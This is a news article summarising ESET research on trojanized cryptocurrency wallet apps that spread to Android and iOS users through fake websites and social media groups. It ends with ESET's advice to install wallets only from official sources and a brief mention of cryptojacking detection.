Research by cybersecurity firm ESET has uncovered a "sophisticated scheme" that spreads Trojan apps masquerading as popular cryptocurrency wallets.
Malicious schemes target mobile devices using the Android or Apple (iOS) operating systems, putting them at risk if users download fake apps.
According to ESET research, these malicious apps spread through fake websites and mimic legitimate crypto wallets, including MetaMask, Coinbase, Trust Wallet, TokenPocket, Bitpie, imToken, and OneKey.
The company also found 13 malicious apps posing as Jaxx Liberty wallets, which are available on the Google Play Store. Google has since removed the offending apps, which were installed more than 1,100 times, but there are still many more on other websites and social media platforms.
Threat actors spread their wares through social media groups on Facebook and Telegram with the intention of stealing crypto assets from victims. ESET claims to have discovered "dozens of trojanized cryptocurrency wallet apps" dating back to May 2021. It also said the scheme was believed to be the work of a group that primarily targeted Chinese users through Chinese websites.
Lukáš Štefanko, the researcher who unraveled the scheme, said there are other threat vectors, such as using an unsecured connection to send a seed phrase to the attacker's server, adding:
"This means victims' funds could have been stolen not only by the scheme's operators, but also by different attackers who were eavesdropping on the same network."
Depending on the device on which it is installed, the fake wallet app behaves slightly differently. On Android, it targets new cryptocurrencies that users may not have traded before, prompting users to install a suitable wallet. On the iOS system, applications need to use any trusted code signing certificate to download in Apple's App Store. This means that a user can have two wallets installed at the same time, one is the real wallet and the other is a Trojan, but the threat is less of a threat since most users rely on app store verification.
ESET recommends that cryptocurrency investors and traders only install wallets from trusted sources linked to the official website of the exchange or company.
In February, Google Cloud launched its Virtual Machine Threat Detection (VMTD) system, which scans and detects "cryptojacking" malware, a type of malware designed to hijack resources and mine digital assets.
According to a January Chainalysis report, between 2017 and 2021, cryptojacking accounted for 73% of the total value received by malware-related wallets and addresses.